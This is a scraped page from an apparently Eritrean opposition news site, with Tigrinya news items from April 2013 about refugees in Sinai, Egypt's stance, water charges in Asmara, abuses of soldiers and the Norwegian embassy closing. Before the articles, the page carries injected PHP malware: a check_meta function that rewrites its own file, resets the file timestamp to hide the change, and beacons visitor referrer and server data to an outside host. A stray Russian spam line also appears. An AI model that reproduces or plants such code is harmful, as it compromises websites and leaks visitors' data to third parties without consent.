check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456727708){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=17&id=18776693&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_content/helpers/helpers.php"); } ኣብ ኤርትራ ዝርከብ ኤምባሲ ኖርወይ ክዕጾ ምዃኑ ተሓቢሩ
кремлевская диета
User Rating: / 4
PoorBest 

 

 

 

 

 

 

27-04-2013


ግብጺ ኣብ ሲናይ ሒዛቶ ዘላ መርገጺ ምልክነት ኢሳይያስ ኣብቲ ገበን ንዘለዎ ኢድ ዘጉልህ ክብሉ ምንጭታት ይገልጹለው።

ግብጺ ኣብ ኢትዮጵያ ኣብ ዝተኻየደ  ፎረም  ኣብ ምድረበዳ ሲናይ በደል ይወርዶም ዘሎ ኤርትራውያን ሓገዝ ከይበጽሖም ምሙጋት እቲ ገበን ኢድ ኢሳይያስ ኣፈወርቅን ዕሱባቱን ከምዘለዎ ክግለጽ ንዘጸንሓ ሓቂ ዝያዳ ዘጉልህ ከምዝኾነ ምንጭታት ሓቢሮም ኣለው።

ኢሳይያስ ሉኡኻቱ ናብ ግብጺ ሰዲዱ ፈለግ ኒል ሉኣለዊ መሰል ግብጺ ክብል ዝሃቦ መግለጺ ስዒቡ ኣብ ምድረበዳ ሲናይ ይሰላሰል ዘሎ ሚልዮናት ዶላራት ዝሓፍስሉ  ገበን ከይኹለፎ ምሕጽንታ ኣቅሪቡ ምንባሩ ዝጠቀሱ እቶም ምንጭታት ግብጺ ኣንጻር ገበናት ንዝለዓለ ስነ ሞገት ዕንቅፋት ክትኸውን ምጅማራ ነቲ ለበዋ ዝሃበቶ እወንታዊ መልሲ ጌርካ ዝቑጸር ምዃኑ ድማ የነጽር።

ግብጺ ኣብቲ መራሕቲ ሃገራት ንኤርትራውያን ሓልዮት ዘርኣየሉ ፎርም ዘይሕጋውያን ስለዝኾኑ ግፍዒ ዝወርዶም ዘሎ ስለዝኾነ ድጋፍ ክግበረሎም የብሉን ክትብል ዘሰደምም መርገጺ ከምዝሓዘት ዝዝከርዩ።

--------------------------------------------//////////-------------------------------

 

27-04-2013

ስርዓት ህግደፍ ንልዕሊ ሓደ ዓመት ማይ ንዘይረኸቡ ነበርቲ ከተማ ኣስመራ ልዕሊ ዓቕሞም ገንዘብ ክኸፍሉ የገድዶም ኣሎ።

መርበብ ሓበሬታ ኣሰና ንምንጭታታ ጠቒሳ ከምዝሓበረቶ ኣብ ከተማ ኣስመራ ንልዕሊ ሓደ ዓመት ማይ ዘይረኸቡ ነበርቲ ናይ ቆጻሪ ኣገልግሎት ዘይከፈልኩም ብዝብል ምስምስ ካብ ዓቕሞም  ንላዕሊ ብገንዘብ ይቅጽዑ ኣለው።

ምምሕዳር እታ ከተማ ቅድመ መጠንቐቕታ ከይሃበ ነቶም ክኸፍሉ ዘይከኣሉ ሰባት መስመር ክቑረጽ ብምባል ከምዘፈራርሑ ዝጠቐሰት እታ መርበብ ሓበሬታ ጥርዓኖም  ዘቀርቡሉ ቤት ጽሕፈትውን ከምዘየለ ሓቢሮም።

እዚ ከምዚ ከሎ እቶም ብቦንድ ኣባይቲ ዝሃነጹ ኣብ ወጻኢ ዝቕመጡ ኤርትራውያን ንኣባይቶም ዝውዕል ኣገልግሎት ኤሌክትሪክ ክረክቡ  ብነፍስ ወከፍ 3000(ሰለስተ ሽሕ) ዶላር ክኸፍሉ ዝተገደዱ ኮይኖም  ዝተኣዘዝዎ ገንዘብ ከፊሎም’ውን ዛጊት እቲ ኣገልግሎት ኤሌክትሪክ ብዘይምርካቦም የንጸርጽሩ ከምዘለው እታ መርበብ ሓበሬታ ገሊጻ’ላ።

መሰረታዊ ጠለባት ኣገልግሎት ማይን ኤሌክትሪክን ከቕርብ ዘይከኣለ ጉጅለ ህግደፍ ኣብ ዝሓለፉ ሒደት ኣዋርሕ ዝገበሮ ዋዕላ ወፍሪ ገንዘብ ህዝቢ ንምዝማት ዝኣለሞ ውዲት ከምዝኾነ ነቲ ስርዓት ብቐረባ ዝፈልጥዎ ወገናት ርእይቶኦም ሂቦሙሉ’ዮም ክትብል ድማ እታ መርበብ ሓበሬታ ወሲኻ ሓቢራ’ያ።

--------------------------------------------//////////-------------------------------

 

28 ሚያዝያ 2013

መላኺ ኢሳይያስ ብጾቱ ንዝገደፍሉ ሕድሪ ጠሊሙ ኣብ ልዕሊ ደቂ ስውኣት ከይተረፈ ኣሰቃቒ ተግባራት ይፍጽም ከም ዘሎ ተቓሊዑ

ስርዓት ኢሳይያስ ዝተፈላለየ ምስምሳት እናተጠቐመ ኣብ ልዕሊ ደቂ ስውኣት ከይተረፈ ዘስካሕክሕ በደላት እናፈጸመ ኣብ ልዕሊ ስውኣት ብጾቱ ይቕረ ዘይብሃል ጥልመት ይፍጽም ከም ዘሎ ሓደ ኣባል ሓይልታት ምኽልኻል ዝነበረ ዜጋ ኣቃሊዑ።

እቲ ዜጋ ምስ ልኡኽ ሬድዮ ወጋሕታ ኣብ ዝገበሮ ቃለመሕተት ስርዓት ኢሳይያስ ልዕሊ ጉቡኡ ይፍጽም ንዘሎ ሓይልታት ምክልኻል ከቢድ መቕጻዕቲ ተጠቒሙ ከርዕዶ ከምዝፍትን ብምግላጽ ኣብ ሓርነታዊ ቃልሲ ክልቲኦም ወለዶም ንዝተሰውኡዎም’ውን ከም ዘይንሕፉዎም ሓቢሩ።

ኣባል ክፍለ ሰራዊት 22 ዝኾነ እቲ ዜጋ መቓልሕ ሃብተ ዝተብሃለ ወዲ ስውኣት ኮብሊልካ ብዝብል ምስምስ ኢዱን እግሩን ኣሲሮም ሙሉእ መዓልቲ ስለዝገተርዎ ኣእዳው ብሕበጥ ተተኪሱ ንስንክልና ከም ዝተቓለዐ ብኣብነት ኣሰንዩ ኣረጋጊጹ’ዩ።

ስርዓት ህግደፍ ኣባላት ክፍለሰራዊት 22 ንዝነበሩ ክፍለ ማትያስ ዮናስ ያቆብን ኣማኑኤል ዓንዶምን ዝተባህሉ ውፍያት መንእሰያት’ውን ዝተፈላላየ ምኽንያታት ፈጢሩ ከምዝረሸኖም ገሊጽና ምንባርና ዝዝከር’ዩ።

---------------------------------------///////---------------------------------------

28 ሚያዝያ 2013

ዘተ ጥጡሕ መሳርሒ ሓድነት ኤርትራዊ ተቓውሞ ሓይልታት

ምዃኑ ግንባር ሃገራዊ ድሕነት ኤርትራ ገሊጹ

ውልቀ መላኺ ኢሳይያስ ኣፈወርቂ ዕድመ ስልጣኑ ንምንዋሕ ዝተፈላለየ ተንኮላዊ ስልቲ እናቀያየረ ኣብ ውሽጢ ስድራቤታት’ውን ከይተረፈ ባህሊ ስለያ ብምእታው ንሓድሕዱ ዘይተኣማመን ሕብረተሰብ ንምፍጣር ኣብ ዝጽዕረሉ ዘሎ እዋን ዘተ ጥጡሕ መሳርሒ ሓድነት ተቓውሞ ሓይልታት ክኸውን ይግባእ ክብል ግንባር ሃገራዊ ድሕነት ኤርትራ ኣብ ዘውጽኦ መግለጺ ሓቢሩ።

ስርዓት ኢሳይያስ ንኣውራጃውነት ብሄራዊን ሃይማኖታዊን ኣፈላላያት ከም መናውሒ ዕድመ ስልጣኑ ክጥቐመሎም ካብ ዝጸንሑ ሜላታት ገሊኦም’ዮም ዝበለ’ቲ መግለጺ ብሰንኪ’ዚ ድማ ኣብቲ ብፍቕሪ ሓድሕድ ዝፍለጥ ዝነበረ ህዝብና ምትእምማን ኣጥፊኡ ሓድነቱ ኣላሕሊሑዎ ምህላዉ ገሊጹ።

ደምበ ተቓውሞ ነዚ ጭቡጥ ህልዊ ክውንነት ‘ዚ ኣብ ግምት ብምእታውን ሓቢሩ ብምዝታይን ዕድመ ገበነኛ ዝሓጽረሉ ሃዋህው ክፈጥር ኣለዎ ክብል ድማ ኣገንዚቡ።

ብመላኺን ኣግላልን ስርዓት ኣብ ልዕሊ ህዝቢ ኤርትራ ይወርድ ንዘሎ ግፍዕታት ድማ ብዘይካ ሓቢርካ ብምዝታይን ሽርሒታት እቲ ስርዓት ብምፍሻልን ካልእ ኣማራጺ ከምዘየለ ኣተምቢሁ።

---------------------------------------/////////-------------------------------------

29 ሚያዝያ  2013

ኣብ ጉዳይ ኤርትራውያን ስደተኛታት ግብጺ ንዘርኣዮቶ መርገጺ ዘይሓላፍነታዊ’ዩ ክብሉ ኤርትራውያን ሙሁራት ገሊጾም።

ንኤርትራውያን ስደተኛታት ዝኮነ ይኹን ሓገዝ ክግበረሎም የብሉን ክብል ኣምባሳደር ግብጺ ኣብ ኢትዮጵያ ንዝሃቦ መግለጺ ሓላፍነት ዝጎደሎ እዩ ክብሉ ኤርትራውያን ሙሁራት ገሊጾም።

ኣብ ኤርትራ ብዘሎ ምልካዊ ስርዓት ስለ ዝተማረሩ’ዮም ዜጋታትና ስደት ዝመርጹ ዘለዉ ዝበሉ እቶም ምሁራት ግብጺ ረብሓ ካብ ዘይብሉ ኣሽካዕላላዊ ዘረባ ተቆጢባ ብባዳዊን ነጋዶ ውሽጣዊ ናውቲ ኣካላት ሰብ መከራ ይጸግቡ ንዘለዉ መሳኪን ኤርትራውያን ናይ ስደተኛታት መሰሎም ክተኽብረሎም ተማሕጺኖም።

ኣብ ቀረባ እዋነ መላኺ ኢሳይያስ ኣፈውርቂ ብልኡኻቱ ኣቢሉ ፈለግ ኒል ልኡላዊ ዋንነት ግብጺ እዩ ክብል ንዝሃቦ ሓሳብ ንግብጺ ክኸሰብ ካብ ምሕሳብ ዝተላዕለ ‘ምበር ተሓላቒ ግብጺ ከም ዘይኮነ ብምሕባር ድማ ግብጺ ንዝሃበቶ መግለጺ ዳግመ ግምት ክትገብረሉ እቶም ሙሁራት ተላብዮም ኣለዉ።

-------------------------------------/////////////////------------------------------

 

 

29 ሚያዝያ  2013

ኣብ ኤርትራ ዝርከብ ኤምባሲ ኖርወይ ክዕጾ ምዃኑ ተሓቢሩ

መርበብ ሓበሬታ ኣሰና ዶት ኮም ከም ዝጸብጸበቶ ኣብ ኤርትራ ዝርከብ ኤምባሲ ኖርወይ ካብ 29 ሚያዝያ ዓመተ 2013 ጀሚሩ ክዕጾ እዩ።

ኣገልግሎት ደልዮም ናብቲ ኤምባሲ ዝኸዱ ኤርትራውያን ብሰራሕተኛታት እቲ ኤምባሲ ካብቲ ዝተጠቐሰ ዕለት ጀሚሩ ኣገልግሎት ምሃብ ደው ከም ዝብል ተነጊሩዎም ክምልሱ ምጽንሖም ድማ እታ መርበብ ሓበሬታ ገሊጻ’ያ።

ኖርወይ ኤምባሲኣ ክትዓጽወሉ ዝተገደደትሉ ምኽንያት ብግቡእ’ኳ እንተዘይተገልጸ ስርዓት ምልክነት ኢሳይያስ ምስ ዝኽተሎ ዘይቅኑዕ ፖሊሲ ኣተሓሕዛ ሰብኣዊ መሰል ዝተኣሳሰረ ክኸውን ከም ዝኽእል ግና ተንተንቲ ፖለቲካ ይገልጹ።

-----------------------------------

 Add comment

Your comments are as important as the article you are commenting on. Please enrich the discussion by avoiding personal attacks. We'll publish your comment, if it meets our criteria. تعليقاتك لا تقل اهمية عن المقال المكتوب اعلاه، فالرجاء اثراء النقاش بالابتعاد عن الاساءات الشخصية. سوف ننشر تعليقك اذا استوف شروط النشرSecurity code
Refresh

Enough dictatorship

Get Adobe Flash player

Arkokabay Media -----> Poem

Get Adobe Flash player

مرض الرئيس الأريتري بين الشائعة والنفي

Get Adobe Flash player

ALIA GABRES- SHE COTTON SUMMER DRESSES

Get Adobe Flash player